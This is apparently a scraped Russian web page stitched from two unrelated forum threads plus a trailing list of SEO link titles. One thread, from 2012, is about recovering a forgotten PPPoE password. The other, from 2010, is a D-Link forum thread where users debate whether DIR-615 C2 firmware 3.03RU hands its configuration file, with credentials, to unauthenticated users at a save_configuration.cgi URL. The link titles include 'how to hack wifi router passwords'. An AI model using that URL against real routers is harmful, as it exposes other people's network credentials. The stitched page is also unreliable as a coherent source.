Сообщения: 14205
Зарегистрирован: 19.04.2002 (Пт) 11:40
Откуда: Russia

Re: Получить забытый пароль PPPoE

Сообщение alibek » 14.05.2012 (Пн) 8:06

1791988 писал(а):Диапазон домашней локальной сети: 192.168.1.0/24

Этот параметр определяешь ты сам.

1791988 писал(а):Диапазон локальной сети провайдера: 10.0.0.0/8

Подключи компьютер к сети провайдера (не запуская PPPoE) и посмотри, какие сетевые параметры компьютеру назначаются.

1791988 писал(а):Интерфейс в маршрутизаторе для подключения локальной сети: vlan1
Интерфейс в маршрутизаторе для подключения интернета: ppp0

Смотри на маршрутизаторе.
Если у тебя такая же модель и такая же прошивка, как в статье, то имена скорее всего тоже совпадут.

Lasciate ogni speranza, voi ch’entrate.


Proxy
Профессор VB наук
Профессор VB наук
Аватара пользователя

 
Сообщения: 2941
Зарегистрирован: 31.08.2007 (Пт) 4:41

Re: Получить забытый пароль PPPoE

Сообщение Proxy » 14.05.2012 (Пн) 18:45

alibek писал(а):Если у тебя такая же модель и такая же прошивка, как в статье, то имена скорее всего тоже совпадут.

Я при настройке интерфейсы методом тыка подбирал, там их очень много и некоторые не очевидные из названия (емнип при настройке маршрутов наткнулся). Не осмелюсь даже предположить их предназначение, физически там только 802.11 интерфейс, свитч на 4 порта Ethernet и 1 обособленный порт того же встроенного свитча (порт WAN, у него где-то порядка 5 режимов и видимо столько же интерфейсов в софтварном представлении). В общем там список где-то из 15-20 интерфейсов, большая часть из которых непонятные аббревиатуры с индексами. Не исключено, что одноимённые интерфейсы с различными индексами могут зависеть от порядка инициализации интерфейсов на конкретной конфигурации.

Follow the white rabbit.



Вернуться в Народный треп

Кто сейчас на конференции

Сейчас этот форум просматривают: SemrushBot и гости: 4

Сообщения без ответов | Активные темы

Автор Сообщение

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 13:10 

Не в сети



Зарегистрирован: Пт мар 26, 2010 09:04
Сообщений: 36

Цитата:

По DIR-615 HW Rev B2 не подтверждаю. Удаленно пытаюсь зайти на такую страницу — пишет «Невозможно открыть страницу». Вечером проверю с локалки…
Прошивка 2.27 бета14.

как я понимаю должен быть открыт удалённый доступ на роутере через порт ХХХХ, соответственно и заходить надо как:

http://IP:port/save_configuration.cgi

пробуй на B2

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 13:15 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Да, сорри, не указал мою прошивку и ревизию. Исправляюсь:

Hardware Version: C2 Firmware Version: 3.03RU

Вернуться наверх

Профиль  

sibuser

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 13:34 

Не в сети



Зарегистрирован: Пн апр 17, 2006 05:20
Сообщений: 255
Откуда: NOVOSIBIRSK

Nite2 писал(а):

По DIR-615 HW Rev B2 не подтверждаю. Удаленно пытаюсь зайти на такую страницу — пишет «Невозможно открыть страницу». Вечером проверю с локалки…
Прошивка 2.27 бета14.

Не проверяйте. Редиректит на страницу авторизации.

P.S.

You do not have permissions to perform the specified action.

You will be redirected to the login page in: seconds.

_________________
DI-604, DIR-615, DIR-100, DVA-G3340S, DES-1008, DWL-2100AP, DNS-300, НОВОТЕЛЕКОМ

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 14:15 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

lon9man писал(а):

Цитата:

По DIR-615 HW Rev B2 не подтверждаю. Удаленно пытаюсь зайти на такую страницу — пишет «Невозможно открыть страницу». Вечером проверю с локалки…
Прошивка 2.27 бета14.

как я понимаю должен быть открыт удалённый доступ на роутере через порт ХХХХ, соответственно и заходить надо как:

http://IP:port/save_configuration.cgi

пробуй на B2

Если у вас админка не смотрит во внешку тогда и пытаться не нужно. А вот если всетаки появляется окно ввода пароля — тогда скрипт сможет работать. Опять таки скажу что я проверял ТОЛЬКО на C2 3.03RU

Вернуться наверх

Профиль  

lon9man

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 15:46 

Не в сети



Зарегистрирован: Пт мар 26, 2010 09:04
Сообщений: 36

..»специалисты» Д-Линка как видим сохраняют олимпийское спокойствие и реагировать не спешат.. КОГДА релиз достойной прошивки с решёнными проблемами безопасности, нерезанной отдачей торрентов и нелагающего IPTV по WiFi??

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 16:04 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

IPTV не лагает. Скорее всего зависит от провайдера. Сам проверял. Когда по «воздуху» не работает, то не работает из напрямую без роутера. Когда напрямую все норм, то и через роутер все ок.

Вернуться наверх

Профиль  

lon9man

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 16:19 

Не в сети



Зарегистрирован: Пт мар 26, 2010 09:04
Сообщений: 36

Вернуться наверх

Профиль  

bazil_k

Заголовок сообщения:

СообщениеДобавлено: Чт апр 15, 2010 19:25 

Не в сети



Зарегистрирован: Чт окт 29, 2009 16:44
Сообщений: 155
Откуда: Украина

Chajok

У меня сабж тоже С2, 3.03RU. Прекрасно увидел по локалке файл save_configuration.cgi со всей информацией :( Удаленно проверить не могу, временно серый IP.

_________________
DAP 1155; DIR 100; DIR 615; DGS-1005D; DGS-1008P; DCS-2103, DCS-2210, DCS-2230.

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 11:54 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Я так понял что только на этой ревизии такие бока.

Кстати, не проверял на базовой прошивке.

Вернуться наверх

Профиль  

Vitaliy Korkunov

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 12:29 



Зарегистрирован: Пн авг 17, 2009 17:18
Сообщений: 7321

Проблему не подтверждаю, для того, чтобы скрипт сработал необходимо быть уже залогиненным на маршрутизатор, иначе появится окно с приглашением вводы логина и пароля как локально, так и удаленно. А то, что указал уважаемый пользователь Chajok — это не что иное как сохранение конфигурации устройства. Массовых взломов не будет.

_________________
Форум не подразумевает под собой быстрый ответ, хотите быстрый и квалифицированный ответ — звоните в техподдержку компании D-Link 8-800-700-5465

Вернуться наверх

Профиль  

Inkobob

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 13:17 

Не в сети



Зарегистрирован: Сб фев 27, 2010 13:43
Сообщений: 24

Vitaliy Korkunov писал(а):

Проблему не подтверждаю, для того, чтобы скрипт сработал необходимо быть уже залогиненным на маршрутизатор …

действительно, так и есть :!:

чего панику разводить…

_________________
D-Link DIR-615 C2 (FW303RUB21beta05)

Вернуться наверх

Профиль  

Chajok

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 13:20 

Не в сети



Зарегистрирован: Чт фев 04, 2010 15:49
Сообщений: 24

Я работаю админом в одном из украинских банков и, уж поверьте, понимаю что пароль может быть хоранен\записан в кукисах. Специально для этого пробовал с другогоа ПК\IP перейти по адресу этого скрипта. Он всеравно отдает файл конфигурации. Да еще и как оно может что-то сторить в кукисах, если все равно там активирована КАПЧА. Т.е даже если логин\пароль подставятся — этого будет недостаточно для успешной авторизации на роутере. Так что скрипт отдает файл конфигурации для НЕАВТОРИЗОВАННЫХ пользователей. Ув. bazil_k и lon9man уже писали что о у них тоже скрипт отдает файл конфига «просто так».

Вернуться наверх

Профиль  

bazil_k

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 14:33 

Не в сети



Зарегистрирован: Чт окт 29, 2009 16:44
Сообщений: 155
Откуда: Украина

Vitaliy Korkunov

Цитата:

Проблему не подтверждаю, для того, чтобы скрипт сработал необходимо быть уже залогиненным на маршрутизатор, иначе появится окно с приглашением вводы логина и пароля как локально, так и удаленно.

Не согласен, прекрасно все показал (локально) без ввода каких-либо паролей и приглашений для проведения авторизации.

_________________
DAP 1155; DIR 100; DIR 615; DGS-1005D; DGS-1008P; DCS-2103, DCS-2210, DCS-2230.

Вернуться наверх

Профиль  

lon9man

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 15:39 

Не в сети



Зарегистрирован: Пт мар 26, 2010 09:04
Сообщений: 36

сколько раз и как надо сказать, чтоб стало доступнее, господа Д-Линк&Co?? отдаёт и набегом, никакой авторизации! я сидя на работе за прокси захожу на роутер с белым IP дома.. как вы проверяете и так уверенно отвечаете??

Вернуться наверх

Профиль  

PriVas

Заголовок сообщения:

СообщениеДобавлено: Пт апр 16, 2010 17:05 

Не в сети



Зарегистрирован: Ср апр 07, 2010 22:37
Сообщений: 9

Проблему подтверждаю!!!!

и по локалке и с интернета

DIR 615 C2 Firmware Version: 3.03RU

Вернуться наверх

Профиль  

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 9

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

  • Как включить adsl на роутере ростелеком
  • Как взломать wifi роутер с телефона
  • Как вернуться к заводским настройкам на роутере keenetic
  • Как взломать пароли wifi роутеров
  • Как включить 5гц на роутере ростелеком